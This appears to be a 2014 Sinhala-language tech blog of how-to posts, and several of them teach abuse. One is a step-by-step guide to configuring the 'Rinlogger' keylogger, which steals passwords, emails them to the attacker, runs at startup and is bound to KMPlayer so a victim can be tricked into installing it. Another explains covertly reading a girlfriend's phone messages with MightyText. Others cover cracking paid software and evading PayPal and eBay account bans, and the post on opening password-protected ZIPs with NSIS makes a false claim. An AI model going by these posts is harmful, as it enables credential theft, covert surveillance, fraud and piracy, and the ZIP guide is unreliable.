Wednesday, January 8, 2014

රහස්‍ය පදය නොදන්නා ZIP/RAR ෆයිල් එකක් විවෘත කරගන්න

මෙම ලිපියෙන් ඔබට ZIP ගොනුවක ඇති රහස්‍ය පදය නොමැතිව විවෘත කරගන්නා අයුරු කියා දෙනු ලැබේ.
මෙම ZIP ගොනුවක් විවෘත කරගැනීම පිළිබඳව විස්තරයක් පියවරනේ පියවර පහතින් දක්වා ඇත. පහත සඳහන් කර ඇති අයුරින්ම ක්‍රියා කිරීම මඟින් ඔබ සතුව ඇති රහස්‍ය පදයක් යොදා ඇති ZIP ගොනුවද විවෘත කරගත හැකි වනු ඇත.


1. ලිපියේ පහතින් ලබා දී ඇති Nullsoft Scriptable Install System (NSIS) මෘදුකාංගය බාගත කරගන්න.

2. ඔබගේ පරිගණකයට එම බාගත කරගනු ලැබූ මෘදුකාංගය ස්ථාපනය කරගන්න.

3. ඉන්පසු NSIS මෘදුකාංගය විවෘත කර Installer based on ZIP Files යන්න මත ක්ලික් කරන්න.
image

4. පසුව ඩයලොග් බොක්ස් එකක් ලැබෙන අතර, එයින් Open යන්න මත ක්ලික් කර ඔබට විවෘත කරගැනීමට අවශ්‍ය කරන ZIP ගොනුව තෝරා දෙන්න.
image

5. ඉන්පසු Generate යන්න මත ක්ලික් කරන්න.

6. මොහොතකින් ඔබට තවත් ඩයලොග් බොක්ස් එකක් ලැබෙන අතර, එහි Close යන්න ක්ලික් කරන්න.
image

7. ඉන්පසු ඔබගේ ZIP ගොනුව ඇති තැනට යන්න. එවිට ඔබට ඔබගේ ZIP ගොනුවේ නමට EXE ගොනුවක් තිබෙනවා දැකගත හැකියි.
image

8. ඒ මත ක්ලික් කර, Install යන්න මත ක්ලික් කරන්න.
image

9. දැන් එම ගොනුවෙහි තිබූ දෑ ඔබ extract කරනු ලැබූ තැන තිබෙනවා දැකගත හැකියි.

බාගත කරගැනීම්:-Download
[2MB]

GFගෙ හොර අල්ලමු.

දැන් ඉතින් වැලන්ටයිමුත් අහ් නෑ නෑ වැලන්ටිටයින්ලුත් ලගයිනෙ කොල්ලනේ....
උබල දැන් පවුල් පන්සල් වෙලත් ඇති නෙහ්?????
ඔන්න ඉතින් උබේ කෙල්ලට ඇන්ඩ්‍රොයිඩ් පෝන් එකක් අරන්දෙන්න වගේ ඉන්නවනම් ඉතින් මගෙන් සුබ පැතුම්......හරි බන් තෑගි නොදුන්නත් කමක් නෑ කෙල්ලට ඇන්ඩ්‍රොයිඩ් පෝන් එකක් තියෙනවනම් එච්චරයි...
(අපෝ තොගෙ වැල බයිලා මට වැඩක් නෑ )
හරි හරි අපි කෙලින්ම බහිමුකො මාතෘකාවට.....


කවදද බන් කෙල්ලො විස්වාස කරන්න පුලුවන්.....
කවුද දන්නෙ වෙන කොල්ලන්ට මැසේජ් ගහනවද කියලා......
කෙල්ලට හොද පාඩමක් උගන්වමු....

උබලා දන්නවද Mighty Text
මේකෙන් වෙන්නෙ පෝන් එකට එන මැසේජ් අපේ කොම්පීතරෙන් අපිට පෙන්නන එක......
(හෆොයි කෙල්ල මාට්ටු )

මෙන්න ලින්ක් එක....මෙන්න මේක කෙල්ලගෙ පෝන් එකට දාන්න....2G on කරපල්ල යකෝ....
https://play.google.com/store/apps/d...=com.texty.sms


මෙන්න ක්‍රෝම් එක්ස්ටෙන්ශන් එක.....උබේ කොන්ටෑක්ස් හිටන් සයින්ක් වෙනවා...මේක උබේ කොම්පීතරේට දාගනින්....ඔවු යකෝ තොගෙ එකට තමයි..
https://chrome.google.com/webstore/d...lcafcmpi?hl=en

දැන් ඉතින් වැඩේ ගොඩ කොල්ලනේ.....කෙල්ලට එති තරම් මැසේජ් කොටන්න කියපන්........

Friday, January 3, 2014

අපගේ පරිගණකය WiFi Hotspot එකක් කරමූ..


අපගේ පරිගණකය WiFi Hotspot එකක් කරමූ..




අපි හැමෝම පරිගණකයෙන් WiFi පහසුකම යොදා ගන්නේ අන්තර්ජාලය සැරිසැරීමට පමණයිනෙ.ඔබගේ පරිගණකයෙන් අන්තර්ජාලය WiFi ලෙස මුදා හැර ඒය තවත් පරිගණකයකින් අන්තර්ජාලය හා සම්බන්ද වන්නට හෝ ඔබගේ WiFi පහසුකම ඇති ජංගම දුරකථනයෙන් අන්තර්ජාලය සැරිසැරීමට කැමති ඇතිනේ.ඒකට එක්කෝ WiFi පහසුකම තියෙන Router එකක් ඕන කියලා දැන් කට්ටියට හිතෙයි.කැමති ඇතිනේ කට්ටියම ඔබගේ පරිගණකය WiFi Hotspot එකක් කරගන්න.මේකට අවශ්‍ය වන්නේ පොඩි මුදෘකාංගයකුයි WiFi පහසුකම තියෙන පරිගණකයකුයි.මුලින්ම එහෙනම් පහතින් මුදෘකාංගය බාගන්න.පහතින් කියා ඇති පරිදි කිරීමෙන් මුදෘකාංගය නොමිලේ කරගත හැකිය.දැන් එහි යූසර්නේම් හා රහස් වචනයක් දීලා ඔබට‍ ඒම පහසුකම අත්විදිය හැකිය.මෙම අවස්ථාවේදී අන්තර්ජාලය ඔබගේ පරිගණකය හරහා share කරනවාද නැද්ද යන්න ඔබ තෝරා ගත යුතු ය.








කොහොමද මුදෘකාංගය ඉන්ස්ටෝල් කරගන්නේ?
පළමුව ඔබ බාගත්තු Connectify.exe සොෆ්ට්වෙයා ඒක පරිගණකයට ඉන්ස්ටෝල් කරගන්න.
දැන් ඔබ මුදෘකාංගයෙන් ඉවත් වන්න.
ලබාදීලා තියෙන ක්‍රැක් ෆයිල් ඒක ඔබගේ මුදෘකාංගය ඉන්ස්ටෝල් වී ඇති තැනට කොපි පෙස්ට් කරන්න.
[ C:\Program file\Connectify ]
අනතුරුව මුදෘකාංගය ක්‍රියාත්මක කරන්න.
දැන් ඒය නොමිලේ පාවිච්චි කරන්න.

ගෙදර කම්පියු‍ටරයෙන්ම 3d movies බලමුද ?

ඊයේ අපේ යාලුවෙක් වැඩ කරන තැනක showroom එකේ දාන්න 3d tv එකක් එවලා උන්ගේ කම්පැනියෙන්
ලොවෙත් ආතල් දවසම රජ මගුල්
කම්පැනියට පිං දි දි දවසම ආතල් එකේ තීඩී බැලුවා

අම්මට හුඩු හවස් වෙනකොට මට තීඩී උණක් හැදිලා ඒක සන්නිපාත තත්ත්වෙට ගිහින්
සනීප වෙන්නෙම නෑ
බෙහෙත් වලට ලක්ෂ 3ක් විතර යනවා (3d tv එකක් ලක්ෂ දෙක තුනක් වෙනවනේ බන්)

ඉතින් ගෙදර ආපු වෙලාවේ ඉදන් ඉන්ටර්නෙට් එකේ කැරකි කැරකි ඉන්න කොට
ලාබෙට තීඩී ආතල් එකක් ගන්න හැටි දැක්කා
උඹලා කරලා බලලා ආතල් එක ගනිල්ලකෝ


දීග නොගී එකීට අහලා ගියත් ඇති කියලා මේක කරලා බලපල්ලා
(දන්න උන් ඇති )
තීඩී ටීවී එකක් ලක්ෂ ගානක් වෙන එකේ බන්
රුපියල් පන්සීයක් වියදම් කරලා මේ වගේ ආතල් එකක් ගත්තම මොකෑ



1.මුලින් ම උඹලා හොයාගන්න ඕනි තීඩී කන්නාඩි කූට්ටමක්
e-bay එකෙන් ගෙන්න ගන්නත් පුලුවන්
පිටකොටුවේ තියනවා මේවා චයිනීස් ඒවා රුපියල් 200ක් වගේ වෙනකොට ගන්න පුලුවන්
(කොත්තුවක් කන්නත් බෑනි බන් දැන් රුපියල් 200ට)
කොහොම හරි දාහට අඩුවෙන් කන්නාඩි කුට්ටමක් සෙට් කරගන්න පුලවන්
ක්ලැසිෆීල්ඩ් වල බලපන්





2.මෙයා තමයි දෙයියා
KMP PLAYER
මේකේ අලුත් වර්ෂන් එකක් බාගන්න ඕනි
මෙන්න ලිංකුව


http://www.kmpmedia.net/





3.තීඩී වීඩියෝත් ඕනිනේ
ටොරන්ට් වලින් බාන්නත් පුලුවන්
නැත්නම් ඉතින් අපේ youtube දෙයියාගෙන් ගන්න පුලුවන්
ගොඩක් film සම්පූර්ණයෙන්ම දාලා තියනවා මේකේ
ex :- titanice 3d full movie
avatar 3d full movie
වගේ කී වර්ඩ් දාලා සර්ච් කරලා බලන්න බඩු හම්බ වෙයි
පොඩ්ඩක් පයිල් කැපෑසිටි එක වැඩියි
ගනන් ගන්න එපා





4.පිංතූර ටිකේ දාලා තියන විදිහට වැඩේ කරලා බලන එකයි තියෙන්නේ





 
රයිට් ඔන්න මං උඹලගේ ලක්ෂ ගානක් ඉතිරි කලා
තව පොඩි කතාවක් කියලම යන්නම්කෝ

අ‍පේ ගාව තියන වීඩියෝ ක්ලිප්
ඔව් ඔව් උඹලගේ කම්පීටරේ තියන ඒවා
පෝන් එකෙන් ගත්ත ඒවා
හැම මගුලම බන්
තීඩී වලට හරවගන්න දැන් සෝෆ්ට් වෙයාර් තියනවා

වැඩේ පට්ටම සුපිරි නෑ
ඒත් එල ආතල් එකක් ගන්න පුලුවන් තරමට ක්ලීන්
අර ඇතුලේ ඇ‍තුලේ හංගලා තියන එකක්
තීඩී වලට හරවගෙන කන්නාඩි දෙක දාලා බලනකොට කොහොම ආතල් එකක් තියෙයිද
ඒකත් කර ගනිල්ලකෝ

මෙන්න භාන්ඩේ ඕනි වීඩියෝ මගුලක් තීඩි වලට හරවගන්න
පිලිගන්න

Wondershare Video Converter Ultimate

බාගන්නන

4 GB Movie එකක් 700 MB වලට Rip කරමුද?



ඔන්න මචෝ අදත් ගෙනාවා වටිනා කියන මෘදුකාංගයක්. මේ මෘදුකාංගය ගැන කියනවනම් මේකෙන් පුලුවන් වෙන්නේ DvD වලින්
වැඩ දාන්න තමයි. ඒ කිව්වේ 4GB වගේ තියන Movie එකක් අපිට පුලුවන් මේ DvDFab කියන මෘදුකාංගය පාවිච්චි කරලා 700 - 1000 MB වගේ ගානකට Rip කරගන්න පුලුවන් Movie එකේ quality එක කිසිම අඩුවක් නැතිවම. ඒකත් .avi .mp4 .mkv .vob වැනි අපි කැමති Format එකකට හරි Apple , Android වැනි Device එකකට ගැලපෙන විදිහට කරන්නත් පුලුවන්. Rip කිරිමට අමතරව මේකෙන් DvD Rip , Converter , Creater , Copy වගේ වැඩත් පට්ට විදිහටම කරගන්න පුලුවන්. දැන් ඉතින් මේක තියන නිසා කඩෙන් ගන්න 4 GB වගේ තියන DvD Movies ගෙඩිය පිටින් Hard එකට කොපි කරන් නැතුව මේකෙන් 700 MB වගේ සයිස් එකකට Rip කරගෙන Hard එකට කොපි කරගෙන Free Space ඉතුරු කරගන්න.





හරි ඉස්සෙල්ලම DVDFab මෘදුකාංගය මෙතනින් බාගන්න. [[ 45 MB ]]





* මෘදුකාංගය සාමාන්‍ය විදිහට Install කරලා අවසාන පියවරේදි මෘදුකාංගය Launch කරන්නේ නැතුව Finish කරලා Crack Folder එකේ තියන " msvcr90.dll " File එක " C:\Program Files\DVDFab 9 " Folder එකට Copy >> Paste කරලා Crack කරගන්න.







DvDFab Features



Support Format



Support Device



හරි ඔන්න Screen Shot ටිකක්



මේ තියෙන්නේ 4.27 GB තිබ්බ සින්හල ෆිල්ම් එකක් 900 MB වලට Rip කරපු Screen Shot









එහෙනම් ඔන්න අපි ගියා.

Rinlogger පාවිච්චි කරලා Gmail,Myspace,Facebook accounts hack කරමු...!



මුලින්ම keylogger එක download කරගෙන ඉන්න ..

RAR pass word @sudusm

https://www.dropbox.com/s/otk7fk8cfy...ING_LOGGER.rar

හරි දැන් .. අපි වැඩේට බහිමු.. මුලින් ඔයා ගත්තු කි ලොගර් එක ඕපන් කරලා.. programme එක run කරන්න
දැන් මම කියන අනු පිළිවෙලට වැඩේ කරන්න...

1) මුලින්ම එන පිටුවෙන් "creat new" කියන එක ක්ලික් කරන්න ..



2) ඊළඟ පිටුවේදී ඔයාගේ email එක password එක type කරන්න .. ඊට පස්සේ Keylogger Recipients කියන තැනට keylogger එකෙන් එවන details යවන්න ඕනි email adress එක type කරලා add කරන්න.. email 3 , 4 කට උනත් යවන්න add කරන්න පුළුවනි..

ඊට පස්සේ next button එක clik කරලා ඊළඟ පිටුවට යන්න ..



3) දැන් මේ පිටුවෙන්.. ඔයාගේ මේල් එකට විස්තර එන්න ඕනි කොච්චර වෙලාවකට සරයක්ද කියන එක දාන්න ඕනි.. ඔතනට විනාඩි 5 වගේ දාන්න .. ඕනි නම් තත්පරෙන් තප්පරේට details එන්නත් හදන්න පුළුවනි.. එහෙම දාල ඉවර වෙලා verify now කියන එක click කරලා. බලන්න.. ඔයාගේ මේල් එකට මේල් එකක් ඇවිල්ල ඇති... දැන් ආයේ next button එක ක්ලික් කරන්න ..



4) දැන් ඊළඟට එන පිටුවේ උඩින්ම තියන install keylogger කියන එක enable කරලා.. exe එකට නමක් දෙන්න ඊට පස්සේ Installation path කියන එකට startup කියන එක දෙන්න ... ඊට පස්සේ ආයේ next ...>>



5) දැන් ඊළඟට එන පිටුවෙන් enable downloader කියන එක enable කරලා ..(requires install) තුන් පාරක් next කරන්න...



6) දැන් enable file binder කියන එක enable කරන්න .. ඊට පස්සේ අපි හදාගන්න keylogger එක bind කරන්න ඕනි.. ඒ කියන්නේ.. එක සම්බන්ද කරන්න ඕනි software එක .. ඒ කියන්නේ..

දැන් අපිට කි ලොගර් එක , මෙන්න ඔයාට කි ලොගර් එකක් කියලදෙන්න බැහැනේ// මොකක් හරි හොර ක්‍රමේකට එපැයි දෙන්න.. ඕක මොකක් හරි සොෆ්ට්වෙයාර් එකක් එක්ක සම්බන්ද කරලා දෙන්න ඕනි.. අන්න..ඒ නිසා.. එකට සම්බන්ද කරන්න.. හොඳ Software එකක් තෝරාගන්න.. මම නං KM player එකත් එක්ක bind කරා..

(crack කරන software පාවිච්චි කරන්න එපා)

*ඔයා තොරගත්තු software එක File binder setup කියන එකෙන් තෝරලා add කරන්න.. ඊට පස්සේ ආයේ next



7) දැන් ඊළඟට එන page එකේ .. Steal passwords කියන එක enble කරන්න .. ඊට පස්සේ ආයේ දෙපාරක් next කරන්න ..



8)ඊළඟට එන පේජ් එකේදී.. ඔය .. හැම.. හිස්තැනකටම දකුණු පැත්තෙන්..ප්‍රශ්නාර්ථ ලකුණක් "?" තියෙන්නේ.. අන්න එක.. පුළුන් තරම්.. පුළුවන් උපරිම වාර ගණනක් ක්ලික් කරන්න.. ක්ලික් කරලා.. ආයේ next කරන්න >>



9) දැන් .. අපි හදපු keylogger එක save කරන්න ඕනි.. Save As කියන තැනින් .. save කරන්න ඕනි තැන දෙන්න.. ඊට පස්සේ .. icon එක අරගෙන .. එක ඔය programme icon කියන තැනට දාන්න ... ඊට පස්සේ compile කියන එක ක්ලික් කරන්න..



දැන් ඉතින් ඔයාගේ key logger එක හරි... ඕක ඉතින් දැන් hack කරන්න ඕනි කෙනාට දෙන්න... මේවා පාවිච්චි කරන්න ඕනි ඉගෙන ගැනීම සඳහා පමණක් නම් ගොඩක් හොඳයි.. මොකද මම එහෙමයි... .. එහෙනං.. ජය වේවා.. ළඟදීම.. තවත් වටිනා පොස්ටුවකින් හම්බු වෙමු..

Paypal and eBAy අපිව track කරන විදිය

මම ebay එකේ Register උනේ 2009, selling පටන් ගත්තෙ 2012, නමුත් මම selling ගැන වැඩිය දන්නෙ නම් නෑ. මම දන්නේ paypal and ebay Account verify කරගන්නා විදිය සහ, එයාල අපිව track කරගන්න විදිය.

මුලින්ම,

Paypal and eBAy අපිව track කරන විදිය.

එයල අපිව track කරන්නේ, Flash Cookies වලින්. එයලට වෙන track කරන්න විදියක් නෑ. මේක multiple account holdersලට වැදගත් වෙයි. කරන්න තියෙන්නෙ, Account එකකින් අනිත් එකට මාරු වෙනකොට, මෙන්න මේ folder එක අතුලෙ ටියන File ටික, Shift+Delete කරන එක.

[Root drive]:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player\

කරල, CCLEANER එකෙන් clean පාරක් දැම්ම නම් හරි.

http://www.piriform.com/ccleaner/download

අපි හිතමු, eBay Account එක suspend වෙලා, Paypal Account එක, limit වෙලා නන්නත්තාර උනා කියල. කරන්න තියෙනෙ, Windows වලින් අලුත් User Account එකක් හදල, CCleaner එකෙන් clean කරල, Flash Cookies Delete කරල, අලුතෙන් වැඩේ පටන් ගන්න එක.

eBay and Paypal වල BOTs තියෙන්නෙ. ඒව unusual activities detect කරන්න, program කරපුව.

Paypal දිගුකල් පැවත්මට ආරක්ශාකාරී උපක්ක්‍රම.

හිතන්න, ඔයාට $900ක් ආව කියල Paypal එකට, Direct payment එකක්. දැන් ඔක ඒ වෙලවෙම, තව කාට හරි යැවුවොත්/withdraw කලොත්, Paypal Account එකට sorry.com. එයල දකින විදියට, ඔයා කරල තියෙන්නෙ වැරදි වැඩක්. අඩුම තරමෙ දවස් 3ක් ඉන්න, Money transfer කරන්න කලින්. නමුත් REFUNDවලට අදාල නෑ මේක.


ඔය $900 send/withdraw කරනකොට, අඩුම තරමෙ, ඔකෙන් %10ක් වත් Paypal Account එකෙ ඉතිරි කරල, ඉතිරි %90 පාවිච්චි කරන්න.

අලුත්ම Paypal Account එකට එක පාරම, ලොකු ගානක් ආවොත් හොදටම අවුල්.

අනිවර්යෙන්ම, ඔයPaypal Account එක verify කරන්න use කරන, debit/credit/vcc/vba number+details කොහේ හරි text/word/excel Document එකක, save කරල තියා ගන්න. limit උනොත් ඔනි වෙනව.


ඔයාට Paypal Account කීපයක් තියනව නම්.

Proxies,Hide My Ass,VPN,TORර්‍ අනිත් IP hiding softwares, පාවිච්චි කරනව නම්, අනිවා බඩු හම්බෙනව.

ඉතින් කරන්න තියෙන්නෙ, router එකෙ IP එක Change කර කර use කරන එක.

ඔයා ලන්කාවෙ ඉදන්, USA වගෙ country එකක Paypal and eBay Accounts නම් use කරන්නෙ, privet proxy පාවිච්චි කරන්න. ඒවනම් ටිකක් ගනන්.

http://changemyip.com

ඔයා සල්ලි යවන්කොට, මේ message එක එනව නම්, ඔයගෙ Account එකෙ සල්ලි තියෙද්දිත්: "Add funds in your PayPal before sending money"

දිගින් දිගටම, try කරන එක නවත්ත්න්න. මොකද, 3-5 පාරක් ට්‍රය් කරපු ගමන්, Paypal Account එක limit වෙනව

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes